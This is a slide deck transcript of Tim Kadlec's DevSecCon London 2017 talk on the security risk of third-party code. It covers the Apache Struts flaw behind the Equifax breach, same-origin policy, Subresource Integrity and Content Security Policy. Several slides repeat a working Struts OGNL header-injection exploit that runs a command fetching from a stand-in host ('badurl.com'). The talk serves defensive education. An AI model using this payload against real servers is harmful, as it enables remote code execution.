Se ha denunciado esta presentación.
Utilizamos tu perfil de LinkedIn y tus datos de actividad para personalizar los anuncios y mostrarte publicidad más relevante. Puedes cambiar tus preferencias de publicidad en cualquier momento.

DevSecCon London 2017: Their-problems-are-your-problems-devseccon by Tim Kadlec

241 visualizaciones

Publicado el

DevSecCon London 2017: Their-problems-are-your-problems-devseccon by Tim Kadlec

Publicado en: Tecnología
  • Sé el primero en comentar

  • Sé el primero en recomendar esto

DevSecCon London 2017: Their-problems-are-your-problems-devseccon by Tim Kadlec

  1. 1. Join the conversation #DevSecCon BY TIM KADLEC
 @TKADLEC Their Problems Are Your Problems
  2. 2. THEIR PROBLEMS ARE
 YOUR PROBLEMS Tim Kadlec | @tkadlec
  3. 3. HELL IS OTHER PEOPLE’S CODECODE
  4. 4. CODE
  5. 5. CODE
  6. 6. CONTEXT
  7. 7. OPINIONS
  8. 8. ASSUMPTIONS
  9. 9. WEB IS POWERED BY OTHER PEOPLE’S CODE
  10. 10. 9 MILLION Different Users
  11. 11. 28% More artifacts indexed in past year
  12. 12. 23,411,471 Packages downloaded per month
  13. 13. HUGE BOOST FOR PRODUCTIVITY
  14. 14. 1,000 DEPENDENCIES
  15. 15. 1,000 DEPENDENCIES ~5 CONTRIBUTORS
  16. 16. 1,000 DEPENDENCIES ~5 CONTRIBUTORS 5,000 DEVELOPERS
  17. 17. 5,000 DEVELOPERS
  18. 18. OFFLOAD THE WORK But not the RISK
  19. 19. OFFLOAD THE WORK But not the RESPONSIBILITY
  20. 20. http://bit.ly/struts-vuln
  21. 21. http://bit.ly/snyk-struts
  22. 22. curl http://demo/struts -H "Content-Type: % {(#_='multipart/form-data'). (#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). (@java.lang.Runtime@getRuntime().exec('curl badurl.com'))}"
  23. 23. curl http://demo/struts -H "Content-Type: % {(#_='multipart/form-data'). (#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). (@java.lang.Runtime@getRuntime().exec('curl badurl.com'))}"
  24. 24. curl http://demo/struts -H "Content-Type: % {(#_='multipart/form-data'). (#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). (@java.lang.Runtime@getRuntime().exec('curl badurl.com'))}"
  25. 25. public HttpServletRequest wrapRequest(HttpServletRequest request) throws IOException { ... if (content_type != null && content_type.contains("multipart/form-data")) { ... request = new MultiPartRequestWrapper(mpr, request, getSaveDir(), provider, disableRequestAttributeValueStackLookup); } else { request = new StrutsRequestWrapper(request, disableRequestAttributeValueStackLookup); } return request; }
  26. 26. public HttpServletRequest wrapRequest(HttpServletRequest request) throws IOException { ... if (content_type != null && content_type.contains("multipart/form-data")) { ... request = new MultiPartRequestWrapper(mpr, request, getSaveDir(), provider, disableRequestAttributeValueStackLookup); } else { request = new StrutsRequestWrapper(request, disableRequestAttributeValueStackLookup); } return request; }
  27. 27. public HttpServletRequest wrapRequest(HttpServletRequest request) throws IOException { ... if (content_type != null && content_type.contains("multipart/form-data")) { ... request = new MultiPartRequestWrapper(mpr, request, getSaveDir(), provider, disableRequestAttributeValueStackLookup); } else { request = new StrutsRequestWrapper(request, disableRequestAttributeValueStackLookup); } return request; }
  28. 28. String errorMessage = buildErrorMessage(e, new Object[] {e.getPermittedSize(), e.getActualSize()});
  29. 29. curl http://demo/struts -H "Content-Type: % {(#_='multipart/form-data'). (#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). (@java.lang.Runtime@getRuntime().exec('curl badurl.com'))}"
  30. 30. MARCH 6: FIXED VERSION RELEASED MARCH 7: EXPLOIT SCRIPTS APPEAR MAY 13-JULY 30: EQUIFAX BREACH SEPTEMBER 7: BREACH ANNOUNCED
  31. 31. 0 225 450 675 900 2007 2008 2009 2010 2011 2012 2013 2014 2015 2016 2017 OPEN-SOURCE LIBRARY VULNS BY YEAR
  32. 32. The human error was that the individual who’s responsible for communicating in the organization to apply the patch, did not. “
  33. 33. EVERYONE’S RESPONSIBILITY
  34. 34. LAYERS OF DEFENSE
  35. 35. 77%USE A VULNERABLE JS LIBRARY
  36. 36. http://bit.ly/lh-audit
  37. 37. http://bit.ly/sonarwhal
  38. 38. ~35%Third-Party Resources (2013)2013
  39. 39. 2013
  40. 40. 2013
  41. 41. 2013
  42. 42. 2013 2017
  43. 43. 2013 2017~53%Third-Party Resources
  44. 44. 77-99%Third-Party Resources 38% of sites
  45. 45. SAME-ORIGIN POLICY
  46. 46. ORIGIN: SCHEME + HOSTNAME + PORT
  47. 47. http://foo.com/index.html
  48. 48. http://foo.com/index.htmlhttp:// scheme
  49. 49. http://foo.com/index.htmlfoo.com scheme host
  50. 50. http://foo.com/index.html scheme host port implied, 80
  51. 51. http://foo.com/index.html http://foo.com/about.html https://foo.com/index.html http://a.foo.com/about.html http://foo.com:80/about.html
  52. 52. http://foo.com/index.html http://foo.com/about.html https://foo.com/index.html http://a.foo.com/about.html http://foo.com:80/about.html
  53. 53. http://foo.com/index.html http://foo.com/about.html https://foo.com/index.html http://a.foo.com/about.html http://foo.com:81/about.html
  54. 54. http://foo.com/index.html http://foo.com/about.html https://foo.com/index.html http://a.foo.com/about.html http://foo.com:81/about.html
  55. 55. http://foo.com/index.html http://foo.com/about.html https://foo.com/index.html http://a.foo.com/about.html http://foo.com:81/about.html
  56. 56. http://foo.com/index.html http://foo.com/about.html https://foo.com/index.html http://a.foo.com/about.html http://foo.com:81/about.html
  57. 57. --disable-web-security
  58. 58. about:blank javascript:
  59. 59. var xhr = new XMLHttpRequest(); xhr.open('GET', "https://www.devseccon.com/"); xhr.send();
  60. 60. <script src=“..."></script> <img src="..." /> <link href="..." />
  61. 61. SUBRESOURCE INTEGRITY
  62. 62. <script src="https://foo.com/framework.js" integrity=“sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/ uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC"> </script>
  63. 63. <script src="https://foo.com/framework.js" integrity=“sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/ uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC"> </script>
  64. 64. CONTENT SECURITY POLICY (CSP)
  65. 65. SAME-ORIGIN POLICY?
  66. 66. WHITELIST
  67. 67. Content-Security-Policy: policy;
  68. 68. Content-Security-Policy: resource-directive source-list;
  69. 69. Content-Security-Policy: script-src ‘self’ https://apis.google.com;
  70. 70. base-uri child-src connect-src font-src form-action frame-ancestors img-src media-src object-src plugin-types report-uri style-src script-src upgrade-insecure-requests
  71. 71. Content-Security-Policy: default-src ‘self’;
  72. 72. none self unsafe-inline unsafe-eval
  73. 73. Content-Security-Policy: default-src 'self'; script-src ‘nonce-2726c7f26c'
  74. 74. <script nonce="2726c7f26c"> alert(123); </script>
  75. 75. Content-Security-Policy: script-src 'sha256- cLuU6nVzrYJlo7rUa6PFrPQrEUpOHllb5ic='
  76. 76. Content-Security-Policy-Report-Only:
  77. 77. CONTENT-SECURITY-POLICY: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src render.githubusercontent.com; connect-src 'self' uploads.github.com status.github.com api.github.com www.google-analytics.com wss://live.github.com; font-src assets-cdn.github.com; form-action 'self' github.com gist.github.com; frame-ancestors 'none'; frame-src render.githubusercontent.com; img-src 'self' data: assets-cdn.github.com identicons.github.com www.google- analytics.com collector.githubapp.com *.gravatar.com *.wp.com *.githubusercontent.com; media-src 'none'; object-src assets-cdn.github.com; plugin-types application/x-shockwave-flash; script-src assets-cdn.github.com; style-src 'unsafe-inline' assets-cdn.github.com
  78. 78. Content-Security-Policy-Report- Only: default-src https:; form-action https:; report-uri https://myreport.com;
  79. 79. Content-Security-Policy: default-src https:; form-action https:; report-uri https://myreport.com;
  80. 80. CONTENT-SECURITY-POLICY: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src render.githubusercontent.com; connect-src 'self' uploads.github.com status.github.com api.github.com www.google-analytics.com wss://live.github.com; font-src assets-cdn.github.com; form-action 'self' github.com gist.github.com; frame-ancestors 'none'; frame-src render.githubusercontent.com; img-src 'self' data: assets-cdn.github.com identicons.github.com www.google- analytics.com collector.githubapp.com *.gravatar.com *.wp.com *.githubusercontent.com; media-src 'none'; object-src assets-cdn.github.com; plugin-types application/x-shockwave-flash; script-src assets-cdn.github.com; style-src 'unsafe-inline' assets-cdn.github.com
  81. 81. SERVERLESS & PAAS
  82. 82. UNPATCHED SERVERS
  83. 83. COMPROMISED SERVERS
  84. 84. WHAT’S THE PATH OF LEAST RESISTANCE?
  85. 85. http://bit.ly/bucket-finder
  86. 86. SECURE BY DEFAULT
  87. 87. OFFLOAD THE WORK But not the RESPONSIBILITY
  88. 88. REAL PEOPLE PAYING THE PRICE
  89. 89. http://bit.ly/owasp-cloud
  90. 90. SYSTEM CONFIGURATION NETWORK LAYER FRONT-END CODE BACK-END COMPONENTS THIRD-PARTY SERVICES
  91. 91. LAYERS OF DEFENSE
  92. 92. EVERYONE’S RESPONSIBILITY
  93. 93. BRING SECURITY TO THE TEAM
  94. 94. WEB IS POWERED BY OTHER PEOPLE’S CODE
  95. 95. WEB’S SAFETY & STABILITY IS UP TO US
  96. 96. Join the conversation #DevSecCon Thank you! Tim Kadlec | @tkadlec

×